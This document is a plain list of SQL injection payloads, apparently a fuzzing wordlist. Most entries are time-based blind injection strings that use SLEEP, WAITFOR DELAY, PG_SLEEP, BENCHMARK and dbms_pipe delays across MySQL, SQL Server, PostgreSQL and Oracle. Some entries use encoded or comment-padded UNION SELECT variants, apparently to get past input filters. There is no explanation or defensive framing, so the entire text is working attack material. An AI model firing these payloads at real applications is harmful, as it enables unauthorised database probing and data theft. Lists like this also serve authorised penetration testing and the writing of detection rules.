
' if(1=1,sleep(10),0)/*'XOR(if(11999=111999,sleep(10),0))OR'"XOR(if(1999=1999,sleep(10),0))OR"*/ 
'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z
,(select * from (select(sleep(15)))a)
';WAITFOR DELAY '0:0:30'--
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
+(select*from(select(sleep(15)))a)+'
"XOR(if(now()=sysdate(),sleep(15),0))XOR"
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
"0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z"
';SELECT PG_SLEEP(15)--
1'//**/oR/**/50!=22;#
' AND (SELECT 8871 FROM (SELECT(SLEEP(15)))uZxz)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
'; IF (1=1) WAITFOR DELAY '0:0:15'--
';WAITFOR DELAY '0:0:30'--
'; IF (1000=1000) WAITFOR DELAY '0:0:15'--
'; SELECT IF (14891=14891),SLEEP(20),'a')--
'pg_sleep(20)
;pg_sleep(20)
)pg_sleep(20)
'; SELECT CASE WHEN (15141=15141) THEN 'a'||dbms_pipe.receive_message(('a'),2) ELSE NULL END FROM dual--
' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '
1' u%u006eion se%u006cect 1
1' u%nion se%lect 1
 UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c)
 SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))
 SELECT(UNHEX(UNHEX(333532453335324533323335)));
 ' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '
